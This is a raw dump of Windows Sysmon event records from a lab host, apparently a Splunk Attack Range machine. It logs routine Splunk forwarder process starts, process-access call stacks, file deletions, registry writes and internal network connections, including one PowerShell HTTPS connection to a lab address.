23542300x800000000000000036495953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:33.238{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB30A34BB33A66DEE7206A5866C5E39B,SHA256=233C6A8E9C0F8E55C61FC48B4175C4650FCA17CF19813DD38CF2416A6DF68E43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036495955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:03.998{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50351-false10.0.1.12-8089- 23542300x800000000000000036495954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:34.256{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74B40AC5302DFDEB9BAE2A6E29D72E26,SHA256=8C6557FBD5E3D19A4184DB62CDFDE337755A47CC7B70823389D36CDD103D495D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036495957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:35.917{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=59965A32C79A16FEE8C63C6951D3F981,SHA256=6EA527B472D187243D23BADB631C301608F35B1A245F57D14DE0F9B9CAE5196D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036495956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:35.271{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D46DAE45B236FC3414E0B7D25782CF0B,SHA256=4DA470F45B14949F117459CBBC49725615B6E2E161590A0877E1BF89700953D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036495959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:05.734{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50352-false10.0.1.12-8000- 23542300x800000000000000036495958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:36.286{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=699C358486E8028C8D005E11BC0690D7,SHA256=DF59C1908D7C550E7FFDF26A39C04D4AF278B098BE5B8B5BFCF9679EDEBCBDAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036495970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:37.842{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F11-6140-4856-04000000C801}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:37.842{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:37.842{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:37.842{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:37.842{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:37.842{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9F11-6140-4856-04000000C801}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036495964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:37.842{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F11-6140-4856-04000000C801}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036495963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:37.837{B81B27B7-9F11-6140-4856-04000000C801}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036495962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:06.449{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50353-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 13241300x800000000000000036495961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:09:37.536{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a969-0xc52bf434) 23542300x800000000000000036495960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:37.290{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95D5F2537A53893CF0F8A9DE93C66277,SHA256=1050602121F7AF131BCA135714DBA2EA70B855BA546BCA4069B7DAC7A85DEB56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036495981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:38.706{B81B27B7-9F12-6140-4956-04000000C801}67686736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:38.541{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F12-6140-4956-04000000C801}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:38.541{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:38.541{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:38.541{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:38.541{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:38.541{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9F12-6140-4956-04000000C801}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036495974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:38.541{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F12-6140-4956-04000000C801}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036495973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:38.520{B81B27B7-9F12-6140-4956-04000000C801}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036495972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:38.304{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24F00B377306AC0A76663922C4DA8EA1,SHA256=B229C71175B0072A4AB16E12335029B8F7870AC6FE8C739AB333F0FBCA92C876,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036495971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:38.005{B81B27B7-9F11-6140-4856-04000000C801}23482340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036495992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:39.328{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCB149B12E53AD1CD342CB3A04F1DE3C,SHA256=59FEC82372D351C9B9E161672E358AF5F71BE51D9E2EEAD757D8512F8458AA4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036495991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:39.150{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F13-6140-4A56-04000000C801}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:39.150{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:39.150{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:39.150{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 